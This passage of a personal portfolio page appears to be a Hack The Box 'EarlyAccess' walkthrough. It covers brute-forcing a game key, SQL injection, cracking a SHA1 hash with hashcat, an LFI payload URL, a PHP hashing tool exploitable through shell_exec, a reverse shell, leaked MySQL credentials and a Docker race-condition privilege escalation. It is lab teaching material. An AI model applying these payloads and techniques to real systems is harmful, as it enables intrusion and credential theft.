                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
